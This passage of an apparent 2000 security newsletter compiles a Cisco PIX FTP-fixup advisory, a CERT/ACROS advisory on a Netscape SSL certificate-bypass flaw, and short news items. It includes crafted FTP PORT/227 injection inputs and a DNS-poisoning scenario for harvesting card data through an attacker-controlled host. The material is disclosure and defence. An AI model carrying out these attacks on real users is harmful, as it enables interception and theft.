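    insp.feed("server", b"227 Entering Passive Mode (10,0,0,5,31,144)': bad command\r\n")
    insp.feed("client", b"227 Entering Passive Mode (10,0,0,5,31,144)\r\n")
    insp.feed("server", b"PORT 10,0,0,5,31,144\r\n")
    insp.feed("client", b"PORT 192,168,0,10,4,0\r\n")                # port 1024
    return insp


if __name__ == "__main__":
    result = demo()
    print("pinholes:", result.pinholes)
    for reason, line in result.rejected:
        print("rejected:", reason, "|", line)
```

The inspector does not model the check that a PORT address belongs to the client that sent it; the advisory's list does not include one.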
Response for the second vulnerability (CSCdr09226)

We have added an additional command keyword to address this problem:

    fixup protocol ftp [strict] [-]

The "strict" keyword directs the fixup protocol ftp command to maintain strict command state, and may impact some FTP features such as command pipelining or command grouping. This will be fixed in version 5.1(2) and subsequent versions, as well as in version 4.4(5).

Software Versions and Fixes

Getting Fixed Software

Cisco is offering free software upgrades to remedy this vulnerability for all affected customers. Customers with service contracts may upgrade to any software version. Customers without contracts may upgrade only within a single row of the table below, except that any available fixed software will be provided to any customer who can use it and for whom the standard fixed software is not yet available. As always, customers may install only the feature sets they have purchased.

Version Affected:
    All versions of Cisco Secure PIX up to version 4.2(5) (including 2.7, 3.0, 3.1, 4.0, 4.1)
  Interim Release** (fix will carry forward into all later versions), Available Now through the TAC:
    4.2(5)205**
  Projected first fixed regular release (fix will carry forward into all later versions):
    4.2(6) Currently not scheduled.*

Version Affected:
    All 4.3.x and 4.4.x up to and including version 4.4(4)
  Interim Release**:
    4.4(4)202**
  Projected first fixed regular release:
    4.4(5) Estimated date available: 2000 May 30*

Version Affected:
    All 5.0.x up to and including version 5.0(1)
  Interim Release**:
    5.0(3)202**
  Projected first fixed regular release:
    5.0(4) Estimated date available: On hold

Version Affected:
    Version 5.1(1) - not affected by CSCdp86352
  Interim Release**:
    5.1(1)207**
  Projected first fixed regular release:
    5.1(2) Estimated date available: 2000 June 9*

* All dates are tentative and subject to change

** Interim releases are subjected to less internal testing and verification than are regular releases, may have serious bugs, and should be installed with great care.

Schedules have been updated to include released versions that fix both vulnerabilities addressed by this interim security advisory.
Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained via the Software Center on Cisco's Worldwide Web site at http://www.cisco.com/.

Customers without contracts should get their upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows:

  * +1 800 553 2447 (toll-free from within North America)
  * +1 408 526 7209 (toll call from anywhere in the world)
  * e-mail: tac@cisco.com

Give the URL of this notice as evidence of your entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Please do not contact either "psirt@cisco.com" or "security-alert@cisco.com" for software upgrades.

Hardware requirements

If version 4.3 or 4.4 is utilized on a PIX 'Classic' (excludes PIX10000, PIX-510, PIX-520, and PIX-515)

or

If version 5.0 is utilized on a PIX 'Classic', PIX10000, or PIX-510 (excludes PIX-520 and PIX-515)

A 128MB upgrade for the PIX Firewall is necessary.

As with any new software installation, customers planning to upgrade should carefully read the release notes and other relevant documentation before beginning any upgrade. Also, it is important to be certain that the new version of Cisco Secure PIX Firewall software is supported by your hardware, and especially that enough memory is available.

Workarounds

The behaviors described in this document are a result of the default command fixup protocol ftp [portnum]. To disable this functionality, enter the command no fixup protocol ftp. This will disable support of the fixup of the FTP protocol in the PIX, and will eliminate the vulnerabilities. The command fixup protocol ftp 21 is the default setting of this feature, and is enabled by default on the Cisco Secure PIX Firewall.

This workaround will force your clients to use FTP in passive mode, and inbound FTP service will not be supported.
Outbound standard FTP will not work without fixup protocol ftp 21, however, passive FTP will function correctly with no fixup protocol ftp configured.

Exploitation and Public Announcements

This vulnerability was proposed on the BUGTRAQ list, and in follow-ups to the article, the Cisco Secure PIX Firewall was also identified as susceptible. As the vulnerabilities have been widely discussed, Cisco is posting this advisory prior to having a full fix. We will update this notice again, when we have a full fix available.

Cisco has had no reports of malicious exploitation of this vulnerability. However, versions of exploit scripts have been posted to various security related lists.

This vulnerability was reported to Cisco via several sources, shortly after the time of the original supposition.

Status of This Notice: INTERIM

This is an interim field notice. Although Cisco cannot guarantee the accuracy of all statements in this notice, all the facts have been checked to the best of our ability. Cisco anticipates issuing updated versions of this notice within four weeks (by June 26, 2000).

Distribution

This notice will be posted on Cisco's Worldwide Web site at http://www.cisco.com/warp/public/707/pixftp-pub.shtml. In addition to Worldwide Web posting, the initial version of this notice is being sent to the following e-mail and Usenet news recipients:

  * cust-security-announce@cisco.com
  * bugtraq@securityfocus.com
  * first-teams@first.org (includes CERT/CC)
  * cisco@spot.colorado.edu
  * comp.dcom.sys.cisco
  * firewalls@lists.gnac.com
  * Various internal Cisco mailing lists

Future updates of this notice, if any, will be placed on Cisco's Worldwide Web server, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the URL given above for any updates.
Revision History

  Revision 1.0  2000 March 16 08:00 AM US/Pacific (UTC+0800) - Initial public release
  Revision 1.1  2000 March 16 08:00 AM US/Pacific (UTC+0800) - Link corrections, table head clarification.
  Revision 1.3  2000 March 16 14:00 PM US/Pacific (UTC+0800) - Addition of 2nd vulnerability issues.
  Revision 1.4  2000 April 4 12:00 PM US/Pacific (UTC+0800) - Changes to dates for fixed software and Status of This Notice section.
  Revision 1.5  2000 April 28 5:30 PM US/Pacific (UTC+0800) - Changes to Summary, Response for the second vulnerability (CSCdr09226), Software Versions and Fixes, and Status of This Notice sections.
  Revision 1.6  2000 May 19 10:45 AM US/Pacific (UTC+0800) - Changes to date in Status of This Notice INTERIM section, and date change in the Software Version and Fixes section.

Cisco Security Procedures

Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's Worldwide Web site at http://www.cisco.com/warp/public/707/sec_incident_response.shtml. This includes instructions for press inquiries regarding Cisco security notices.

@HWA

211.0 [HNS] May 22:INDIA AND CYBER CRIME
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by BHZ
Monday 22 May 2000 on 7:11 PM

The Times of India published an article about cyber crime, where they mention trojan horses as "cyber terrorism weapons". Another part of the article speaks of what the police would do to fight cyber crime. "The police headquarters here has just two Internet connections. And only 30 officers were introduced to a beginners' guide to computers early this year"...
Link: The Times of India http://www.timesofindia.com/210500/21home5.htm @HWA 212.0 [IND] CERT® Advisory CA-2000-05 NS Improper SSL validation ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Netscape Navigator Improperly Validates SSL Sessions http://www.cert.org/advisories/CA-2000-05.html CERT® Advisory CA-2000-05 Netscape Navigator Improperly Validates SSL Sessions Original release date: May 12, 2000 Source: ACROS, CERT/CC A complete revision history is at the end of this file. Systems Affected Systems running Netscape Navigator 4.72, 4.61, and 4.07. Other versions less than 4.72 are likely to be affected as well. Overview The ACROS Security Team of Slovenia has discovered a flaw in the way Netscape Navigator validates SSL sessions. I. Description The text of the advisory from ACROS is included below. It includes information CERT/CC would not ordinarily publish, including specific site names and exploit information. However, because it is already public, we are including it here as part of the complete text provided by ACROS. =====[BEGIN-ACROS-REPORT]===== ========================================================================= ACROS Security Problem Report #2000-04-06-1-PUB ------------------------------------------------------------------------- Bypassing Warnings For Invalid SSL Certificates In Netscape Navigator ========================================================================= FULL REPORT PUBLIC ====== Affected System(s): Netscape Navigator & Communicator Problem: Bypassing Warnings For Invalid SSL Certificates Severity: High Solution: Installing the Personal Security Manager or Installing the newest Netscape Communicator (v4.73) Discovered: April 3, 2000 Vendor notified: April 4, 2000 Last update: May 10, 2000 Published: May 10, 2000 SUMMARY ======= Our team has discovered a flaw in Netscape Navigator that allows bypassing of warning about an invalid SSL certificate. 
SSL protection is used in most major Internet-based financial services (e-banking, e-commerce). The flaw we have found effectively disables one of the two basic SSL functionalities: to assure users that they are really communicating with the intended web server - and not with a fake one. Using this flaw, the attacker can make users send secret information (like credit card data and passwords) to his web server rather than the real one - EVEN IF THE COMMUNICATION IS PROTECTED BY SSL PROTOCOL. INTRODUCTION (skip this section if you already understand how SSL works) ============ When a web browser tries to connect to a SSL-protected server, a so-called SSL session is established. At the beginning of this session the server presents his SSL certificate containing his public key. At this point, browser checks the certificate for the following conditions (*): 1) Certificate must be issued by a certificate authority trusted by browser (some are default: Verisign, Thawte etc.) 2) Certificate must not be expired (its expiry date:time must be later than the current system date:time on the computer browser is running on) 3) Certificate must be for the server that browser is connecting to (if browser is connecting to www.e-bank.com, the certificate must be for www.e-bank.com) All three conditions must be met for browser to accept the certificate. For every condition not met, browser should display a warning to the user and then user can decide whether connection should be established or not. These three conditions combined provide user with assurance that his browser is really connecting to the correct server and not to some fake server placed on the Internet by malicious individual(s) trying to trick users to give them credit card information, passwords and other secret information. For example, let's take a look at a sample web e-banking system that doesn't use SSL certificates and requires one-time password tokens for user authentication. 
User connects to http://www.e-bank.com. Browser asks DNS server for IP address of www.e-bank.com and gets 100.100.100.100. Browser then connects to 100.100.100.100 and user is presented with login form asking for his username and one-time password. He enters this data and starts using e-banking services. A simple attack (called web-spoofing) on this system is to attack the DNS server and "poison" its entry for www.e-bank.com with attacker's IP address 99.99.99.99. Attacker sets up a web server at 99.99.99.99 that web-wise looks exactly like the original www.e-bank.com server. User trying to connect to www.e-bank.com will now instead connect to the attacker's server and provide it with his one-time password. Attacker's server will use this password to connect to the real server at 100.100.100.100 and transfer all of the user's money to his secret Swiss bank account ;-). This attack is successfully disabled by using SSL protocol. In that case, when browser falsely connects to www.e-bank.com at 99.99.99.99 rather than to 100.100.100.100, attacker's server must provide a valid certificate for www.e-bank.com, which it can't unless the attacker has stolen the secret key and the certificate from the real server. Let's look at three possibilities: 1) Attacker could issue a certificate for www.e-bank.com himself (on his own CA). That wouldn't work since his CA is not trusted by user's browser. 2) Attacker could use a stolen expired key and certificate (those are often not protected as strongly as valid ones since one could think they can't be used any more). That wouldn't work since browser will notice that certificate is expired. 3) Attacker could use a valid key and certificate for some other site (e.g. www.something.org). That wouldn't work since browser will accept only valid certificates for www.e-bank.com. It would seem that this problem of web-spoofing is successfully solved with SSL certificates. 
PROBLEM ======= There is a flaw in implementation of SSL certificate checks in Netscape Navigator. The Flaw -------- Netscape Navigator correctly checks the certificate conditions (*) at the beginning of a SSL session it establishes with a certain web server. The flaw is, while this SSL session is still alive, all HTTPS connections to *THAT SERVER'S IP ADDRESS* are assumed to be a part of this session (and therefore certificate conditions are not checked again). Instead of comparing hostnames to those of currently open sessions, Navigator compares IP addresses. Since more than one hostname can have the same IP address, there is a great potential for security breach. This behavior is not in compliance with SSL specification. DEMONSTRATION ============= The following will try to demonstrate the flaw. It is assumed that for redirecting user's web traffic, the attacker will generally use "DNS poisoning" or reconfiguring routers, while in our demonstration we will use the HOSTS file on client computer to get the same effect and make it easier to reproduce the flaw. In this demonstration, we will make Navigator open Thawte's homepage over secure (HTTPS) connection while requesting Verisign's home address at https://www.verisign.com. Thawte's and Verisign's homepages are used as examples - this would work just the same on any other secured web sites. 1) First, add the following line to the local HOSTS file on the computer running the Navigator and save it: 207.240.177.177 www.verisign.com This will make the computer (and, consequently, the browser) think that IP address of www.verisign.com (which is actually 205.139.94.60) is in fact 207.240.177.177 (which is actually IP address of www.thawte.com). 
At this point it is important to note that SSL, if correctly implemented, provides protection against such "domain name spoofing", because while the browser will connect to the wrong server, that server will not be able to provide a valid SSL certificate and the SSL session will not be established (not without user being warned about the certificate). 2) Close all instances of Navigator to clean any cached IP addresses. 3) Open Navigator and go to https://www.thawte.com. It works as it should - Thawte's server provides a valid SSL certificate for its hostname (www.thawte.com) and so the SSL session is established. 4) With the same instance of Navigator, go to https://www.verisign.com. Now watch the Thawte's homepage appear again WITHOUT ANY WARNINGS! What happened here? In step 3), Navigator looked up the IP address for www.thawte.com (from the DNS server) and found 207.240.177.177. It tried to establish a SSL session with that IP address and correctly checked all three certificate conditions (*) - indeed, if any of them weren't true, a warning would pop up. In step 4), Navigator looked up the IP address for www.verisign.com (this time from HOSTS file, but it could easily have been from the same DNS server) and found again 207.240.177.177. Now, since there was already one SSL session open with that IP address, Navigator *INCORRECTLY* decided to use that session instead of establishing another one. EXPLOIT ======= This exploit will show how the flaw could be used to gather user's secret information. Assume there is a web bookstore at www.thebookstore.com. Users go to http://www.thebookstore.com (via normal HTTP connection), browse the books and add them to their virtual shopping baskets. At the check-out, they are directed to a secure order form (e.g. https://www.thebookstore.com/order_form.html) where they enter their personal and credit card information which is then submitted (again via secure HTTPS connection) to the server. 
This is a typical web e-commerce concept. Assume that IP address of www.thebookstore.com is 100.100.100.100. The attacker sets up his own web server with IP address 99.99.99.99 and installs on it a valid SSL certificate for host www.attacker.com (he could have purchased this certificate from e.g. Verisign if he owns the domain attacker.com; he could have stolen the certificate or he could have broken into a web server with a certificate already installed). The attacker makes this web server function as a gateway to www.thebookstore.com - meaning that all requests are forwarded to www.thebookstore.com, so virtually this server "looks and feels" exactly like the real www.thebookstore.com. There is just one difference: the page before the order form (e.g. http://www.thebookstore.com/basket.html) contains a small (1x1) image originating from https://www.attacker.com (secure HTTPS connection). Then, the attacker "poisons" a heavily used DNS server so that it will return 99.99.99.99 for requests about www.thebookstore.com (normally it returns 100.100.100.100). What happens then? All users of that DNS server who will try to visit (via normal HTTP) http://www.thebookstore.com will connect to 99.99.99.99 instead of 100.100.100.100 but will not notice anything because everything will look just the way it should. They will browse the books and add them to their shopping baskets and at check-out, they will be presented with the order form https://www.thebookstore.com/order_form.html. But the previous HTML page containing the hyperlink to the order form will also contain a small (1x1) image with source https://www.attacker.com/a.gif. Navigator will successfully download this image and for that it will establish a SSL session with www.attacker.com. This session then stays open. When the order form is accessed, Navigator tries to establish another SSL session, this time to www.thebookstore.com. 
Since DNS server claims this server has the same IP address as www.attacker.com (99.99.99.99), Navigator will use the existing SSL session with 99.99.99.99 and will not check the certificate. The result: Navigator is displaying a SECURE ORDER FORM that it believes to be originating from the genuine server www.thebookstore.com while in fact it is originating from the fake one. No warning about an invalid certificate is issued to the user so he also believes to be safe. When user submits his secret information, it goes to (through) the attacker's server where it is collected for massive abuse. For users to notice the foul play they would have to look at the certificate properties while on a "secure" page https://www.thebookstore.com/... The properties would show that the certificate used was issued for host www.attacker.com. Also, monitoring network traffic would show that the server is not at 100.100.100.100 where it should be but rather at 99.99.99.99. It is a very rare practice to check any of these when nothing suspect is happening. Notes ----- It should be noted that in the previous exploit, if the users tried to access https://www.thebookstore.com over secure (HTTPS) connection from the very start, Navigator would issue a warning. It is imperative for the exploit to work that some time *before* the first secure connection to https://www.thebookstore.com a successful secure connection is made to https://www.attacker.com. That's why a valid certificate must be installed on www.attacker.com. Also, it should be noted that Navigator's SSL sessions don't last forever. We haven't been able to predict the duration of these sessions (it seems to be depending on many things like inactivity time, total time etc.) and we also haven't investigated the possible effects of SSL session resuming. 
SOLUTION ======== Netscape has (even prior to our notification - see the Acknowledgments section) provided a Navigator Add-on called Personal Security Manager (PSM), freely downloadable at: http://www.iplanet.com/downloads/download/detail_128_316.html Installation of PSM, as far as we have tested it, corrects the identified flaw. Netscape Communicator (v4.73) currently includes the fix for this vulnerability. It is available for download at: http://home.netscape.com/download/ WORKAROUND ========== Navigator/Communicator users who can't or don't want to install PSM can use a "manual" method to make sure they are not under attack: When visiting an SSL-protected site, double click on the lock icon (bottom left corner) or the key icon (in older browsers) and see whether the certificate used for the connection is really issued for the correct hostname. E.g. If you visit https://www.verisign.com, make sure the certificate used is issued for www.verisign.com and not for some other hostname. ADVISORY ======== It is important to emphasize that the flaw presented completely compromises SSL's ability to provide strong server authentication and therefore poses a serious threat to Navigator users relying on its SSL protection. Users of web services --------------------- Netscape Navigator/Communicator users who are also users of any critical web services employing Secure Sockets Layer (SSL) protection to provide secrecy and integrity of browser-server communication are strongly advised to install Personal Security Manager or upgrade to Communicator 4.73 and thus disable this vulnerability. Main examples of such critical web services are: - web banking systems (especially the ones using passwords for authentication - even one-time passwords), - web stores (especially the ones accepting credit card data) and - other web-based e-commerce systems. 
Providers of web services ------------------------- Providers of critical web services employing Secure Sockets Layer (SSL) protection to provide secrecy and integrity of browser-server communication should advise their users to install Personal Security Manager or upgrade to Communicator 4.73 and thus disable this vulnerability. Since this vulnerability allows for the type of attack that can completely bypass the real/original web server, there are no technical countermeasures which providers of web services could deploy at their sites. Web services using client SSL certificates for user authentication ------------------------------------------------------------------ This vulnerability does NOT allow the attacker to steal client's SSL key and thus execute the man-in-the-middle attack on web services using client SSL certificates for user authentication. It still does, however, allow the attacker to place a fake server (an exact copy) and collect other information users provide (including the data in their client SSL certificates). TESTING RESULTS =============== Tests were performed on: Communicator 4.72 - affected Communicator 4.61 - affected Navigator 4.07 - affected ACKNOWLEDGMENTS =============== We would like to acknowledge Netscape (specifically Mr. Bob Lord and Mr. Kevin Murray) for prompt and professional response to our notification of the identified vulnerability and their help in understanding the flaw and "polishing" this report. We would also like to acknowledge Mr. Matthias Suencksen of Germany, who has discovered some aspects of this vulnerability before we did (back in May 1999). REFERENCES ========== Netscape has issued a Security Note about this vulnerability under a title "The Acros-Suencksen SSL Vulnerability" at: http://home.netscape.com/security/notes/index.html SUPPORT ======= For further details about this issue please contact: Mr. Mitja Kolsek ACROS, d.o.o. 
Stantetova 4 SI - 2000 Maribor, Slovenia phone: +386 41 720 908 e-mail: mitja.kolsek@acros.si PGP Key available at PGP.COM's key server. PGP Fingerprint: A655 F61C 5103 F561 6D30 AAB2 2DD1 562A DISTRIBUTION ============ This report was sent to: - BugTraq mailing list - NTBugTraq mailing list - Win2KSecAdvice mailing list - SI-CERT - ACROS client mailing list DISCLAIMER ========== The information in this report is purely informational and meant only for the purpose of education and protection. ACROS, d.o.o. shall in no event be liable for any damage whatsoever, direct or implied, arising from use or spread of this information. All identifiers (hostnames, IP addresses, company names, individual names etc.) used in examples and exploits are used only for explanatory purposes and have no connection with any real host, company or individual. In no event should it be assumed that use of these names means specific hosts, companies or individuals are vulnerable to any attacks nor does it mean that they consent to being used in any vulnerability tests. The use of information in this report is entirely at user's risk. COPYRIGHT ========= (c) 2000 ACROS, d.o.o., Slovenia. Forwarding and publishing of this document is permitted providing all information between marks "[BEGIN-ACROS-REPORT]" and "[END-ACROS-REPORT]" remains unchanged. =====[END-ACROS-REPORT]===== II. Impact Attackers can trick users into disclosing information (potentially including credit card numbers, personal data, or other sensitive information) intended for a legitimate web site, even if that web site uses SSL to authenticate and secure transactions. III. Solution Install an update from your vendor. Appendix A lists information from vendors about updates. If you are a DNS administrator, maintain the integrity of your DNS server One way to exploit this vulnerability, described above, relies on the ability of the attacker to compromise DNS information. 
If you are a DNS administrator, making sure your DNS server is up-to-date and free of known vulnerabilities reduces the ability of an intruder to execute this type of attack. Administrators of BIND DNS servers are encouraged to read http://www.cert.org/advisories/CA-2000-03.html Validate certificates at each use Despite the existence of this flaw, it is still possible to guard against attempted attacks by validating certificates manually each time you connect to an SSL-secured web site. Doing so will substantially reduce the ability of an attacker to use flaws in the DNS system to bypass SSL-authentication. Appendix A. Vendor Information iPlanet Information about this problem is available at http://home.netscape.com/security/notes/index.html Microsoft None of our products are affected by this vulnerability. The CERT Coordination Center thanks the ACROS Security Team of Slovenia (Contact: mitja.kolsek@acros.si), for the bulk of the text in this advisory. Shawn Hernan was the primary author of the CERT/CC portions of this document. This document is available from: http://www.cert.org/advisories/CA-2000-05.html CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. 
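The flaw the ACROS report describes earlier in this advisory (an open SSL session being reused for any hostname that resolves to the same IP address) and the "validate certificates at each use" advice above, modelled as an added Python example that is not part of the CERT or ACROS text. Class and function names are hypothetical; the hostnames and addresses are the report's own example values, and the certificate record is constructed.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Cert:
    subject: str          # hostname the certificate was issued for
    trusted_issuer: bool  # condition 1: issued by a CA the browser trusts
    expired: bool         # condition 2: not past its expiry date


def certificate_warnings(cert, hostname):
    """The three conditions (*) from the report; an empty list means accept."""
    warnings = []
    if not cert.trusted_issuer:
        warnings.append("untrusted issuer")
    if cert.expired:
        warnings.append("expired")
    if cert.subject.lower() != hostname.lower():   # condition 3
        warnings.append(f"issued for {cert.subject}, not {hostname}")
    return warnings


class Browser:
    """Toy model of a browser's SSL session cache.

    key_by="ip"   : session lookup by server IP only (the behaviour the
                    report attributes to the affected Navigator versions)
    key_by="host" : session lookup by (hostname, IP), so a different name
                    on the same address gets a full certificate check
    """

    def __init__(self, dns, servers, key_by):
        self.dns = dns            # hostname -> IP, as the resolver answers
        self.servers = servers    # IP -> certificate that server presents
        self.key_by = key_by
        self.sessions = {}

    def connect(self, hostname):
        ip = self.dns[hostname]
        key = ip if self.key_by == "ip" else (hostname.lower(), ip)
        if key in self.sessions:
            # Existing session: no certificate check is performed.
            return {"ip": ip, "cert": self.sessions[key],
                    "reused": True, "warnings": []}
        cert = self.servers[ip]
        warnings = certificate_warnings(cert, hostname)
        if not warnings:          # assume the user declines on any warning
            self.sessions[key] = cert
        return {"ip": ip, "cert": cert, "reused": False, "warnings": warnings}


# Resolver state from the report's scenario: both names answer 99.99.99.99,
# and that server holds a valid certificate for www.attacker.com only.
DNS = {"www.attacker.com": "99.99.99.99", "www.thebookstore.com": "99.99.99.99"}
SERVERS = {"99.99.99.99": Cert("www.attacker.com", trusted_issuer=True, expired=False)}


def visit(key_by):
    """Load the 1x1 image host first, then the order form host."""
    browser = Browser(DNS, SERVERS, key_by)
    first = browser.connect("www.attacker.com")
    second = browser.connect("www.thebookstore.com")
    return first, second


if __name__ == "__main__":
    for mode in ("ip", "host"):
        _, order_form = visit(mode)
        manual = certificate_warnings(order_form["cert"], "www.thebookstore.com")
        print(mode, "reused:", order_form["reused"],
              "warnings:", order_form["warnings"], "manual check:", manual)
```

With `key_by="ip"` the second connection raises no warning, yet running `certificate_warnings` by hand on the certificate in use still reports the mismatch, which is the manual workaround both advisories recommend.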
Getting security information

CERT publications and other security information are available from our web site
http://www.cert.org/

To be added to our mailing list for advisories and bulletins, send email to cert-advisory-request@cert.org and include SUBSCRIBE your-email-address in the subject of your message.

* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.

NO WARRANTY

Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.

Conditions for use, disclaimers, and sponsorship information

Copyright 2000 Carnegie Mellon University; portions Copyright 2000 ACROS, d.o.o., Slovenia.

Revision History

May 12, 2000: Initial release

@HWA

213.0 [MM] IBM will only hire imitation hackers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Packetstorm and ZDNet
http://www.anchordesk.co.uk/anchordesk/commentary/columns/0,2415,7102547,00.html

May 16, 2000

IBM will only hire imitation hackers

David Binney, director of corporate security for IBM stated, "IBM would never consider hiring a reformed hacker. It would be like hiring a burglar to institute a burglar system in your house. You wouldn't do it." When Lewis Koch, a journalist with ZDNET UK, attempted to ascertain if there were any ulterior motives for the statement, Binney backed out of the interview. Read the entire story (below). Thanks to Jane Oliver at ZDNET for the submission.

- Packetstorm

ZDnet; Commentary Box
May 15, 2000

What the hack did he say?

"IBM would never consider hiring a reformed hacker.
It would be like hiring a burglar to institute a burglar system on your house. You wouldn't do it." So said David Binney, director of corporate security at IBM, in Solar Sunrise, a video produced last year by the Federal Bureau of Investigation and the National Infrastructure Protection Center, ostensibly to deter people from hacking.

By Lewis Z. Koch

In Binney's view, hackers, like burglars, break in with the intent to steal. IBM won't hire you, he said, and neither will any responsible computer security firm. Hack and you'll never work in this town again.

Don't believe it, Binney. The town and the times are a-changin'.

Testing the thesis

A number of top-tier, high-profile firms feel differently about hackers. Evidence? Look at the recent joint venture among a group of hackers known as the L0pht, Compaq Computer and Forrester Research that involves $10 million in venture capital. There's nothing "reformed" about the L0pht; members wear the mantle of hacker proudly, says Space Rogue, a L0pht member in good standing.

Although not a hacker, reformed or otherwise, Steve Lutz, president of WaySecure Consulting, hires reformed hackers. His company offers a full range of computer security consulting, including evidence gathering, risk assessment, security testing and training. Among the hundreds of clients he and his hackers have served are Chase Manhattan, American Express, Morgan Stanley Dean Witter, insurance giant Transamerica, TIAA-CREF, the U.S. Navy and the U.S. Army - organisations with serious items to protect: money, stocks, bombs.

"I hired several hackers," Lutz says, "the most famous, perhaps notorious, being Mark Abene, a.k.a. Phiber Optik. I brought Mark into the security consulting world by hiring him when he was released from prison. He worked for me for about two years and then started his own company, called Crossbar Security.
Mark is a perfect example of the nation's most feared hacker turning around and providing a valuable service to the commercial sector and reaping the rewards that go with it."

Lutz says hiring hackers as consultants can be "highly rewarding. This is true for both the clients we serve and... the hackers themselves. Many young, talented hackers are bored and looking for something to do. By providing them with a constructive objective and rewarding them monetarily, we help focus them in a positive direction that keeps them busy and out of trouble."

The idea, as Lutz sees it, is to manage them and teach them business skills, not banish or outlaw them.

Inquiring minds

Could Binney have had an ulterior motive for his statement? IBM has what it calls an "ethical hackers" unit that will, for $15,000 to $40,000, according to the company, "simulate a real intruder's attack, but in a controlled, safe way." IBM's Internet Security Assessments, for $40,000 to $200,000, will tell companies if their Web sites are vulnerable and, if so, shore the sites up.

I asked computer security people all over the Net what they would like me to ask Binney. But after initially agreeing to an interview on Feb. 8, Binney changed his mind and has since been unavailable for comment, despite numerous phone calls, messages and e-mails. The questions, though, have value in themselves...

Carole Fennelly is a security consultant and partner at Wizard's Keys, a Tinton Falls, N.J., consulting company specializing in computer systems security. Fennelly had three sets of questions:

1. If IBM doesn't use hackers for penetration tests, then what is so special about its test? If it is merely testing for known vulnerabilities using a package like ISS Scanner [which uncovers vulnerabilities likely to be exploited during attempts to attack a network and provides the necessary corrective actions], why should a company pay big bucks for that? Why couldn't companies just run the scan themselves?
2. Has IBM ever encountered a site with really iron-clad security? If so, what did IBM put in the report? IBM can answer that one without naming the company, just as physicians mask the identities of their patients, while still providing the data necessary for studies.

3. When IBM makes recommendations, does it refer the client to a vendor with which it has a partnership? Does it offer to do the work itself? They're not using the audit as a marketing opportunity, are they? Audits can be legitimate opportunities for a company to prove its worth to the client. It can also become a con job targeting overworked and understaffed technical administrators.

Sage security advice

Matthew G. Devost, a senior information security analyst at Security Design International, a firm providing security consulting services to international corporations and governments, warns against using large firms that offer prepackaged security solutions.

"With large consulting or product companies, the security consulting team is often used as a mechanism for pushing other products or services," Devost says. He also cautioned against an assessment team that benefits from future product sales or follow-up implementation support.

"Pay close attention to methodology," Devost says. "If a company offers a quote without first understanding your network, their assessment can't really be trusted." Other things that don't bode well, Devost says, are the use of a single commercial product or reliance on assessment tools.

Devost says customers should check the qualifications of the security team. "Will the names provided be directly involved in your assessment? Beware the bait-and-switch technique, where a team of senior security engineers is offered up, but replaced by a team of recent college graduates at the last minute."

Cast a wide net, Devost says. "There are a hundred reasons why you should avoid using a large consulting company to perform a security assessment...
[which] will become apparent only when you broaden the spectrum of firms you solicit for quotes. Pay very close attention to the technical substance of their proposals."

So, contrary to what Binney said, with all the problems around the Internet - denial-of-service attacks out of nowhere, computer malfunctions and software vulnerabilities - there is a growing market for reformed hackers, one that's lucrative and fun and, best of all, legal.

If you want to respond to this piece, talk to the author, voice an opinion or just tell us how we can improve AnchorDesk UK, come to our TalkBack forums and have your say ...

@HWA

214.0 [IND] BUGTRAQ: "Vulnerability statistics database"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.securityfocus.com/frames/?content=/vdb/stats.html

This is interesting, but I feel they should have included more relevant information like how many units are in production use and how many units are home or business based etc in this analysis. - Ed

Follow url for more stats and graphs etc.

Number of OS Vulnerabilities by Year

OS                    1997  1998  1999  2000
Debian                   2     2    29     5
FreeBSD                  4     2    18     6
HP-UX                    8     5     7     3
IRIX                    26    13     8     3
Linux (aggr.)           10    23    84    30
MacOS                    0     1     5     0
MacOS X Server           0     0     1     0
NetBSD                   1     4    10     3
OpenBSD                  1     2     4     2
RedHat                   5    10    38    17
Solaris                 24    31    34     6
Windows 3.1x/95/98       1     1    46    11
Windows NT               4     6    99    34

@HWA

215.0 [MM] Big Brother has your file
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.canoe.ca/TorontoNews/ts.ts-05-17-0016.html

Wednesday, May 17, 2000

Big Brother has your file

Huge data bank worries privacy watchdog

By SEAN DURKAN, OTTAWA BUREAU

OTTAWA -- Big Brother is watching you.

The federal government has "a de facto citizen profile" on virtually everyone living in Canada, Privacy Commissioner Bruce Phillips revealed yesterday.

The massive data bank, which is vulnerable to misuse, is run by Jane Stewart's Human Resources and Development Canada -- the same department under fire for its handling of $1 billion in job grants.
The data bank contains as many as 2,000 pieces of information on each of 33.7 million individuals, Phillips said in his annual report to Parliament.

The dossier, which tracks Canadians from cradle to grave and is never purged, includes information about each person's education, marital status, ethnic origin, mobility, disabilities, income tax, employment and welfare history.

TAX RETURNS

The information is taken from income tax returns, child tax benefits, immigration and welfare files, the National Training Program, Canadian Job Strategy, employment services, employment insurance, job records and the social insurance master file.

"Continually centralizing and integrating so much personal data on almost every person in Canada poses significant risks to our privacy," Phillips said.

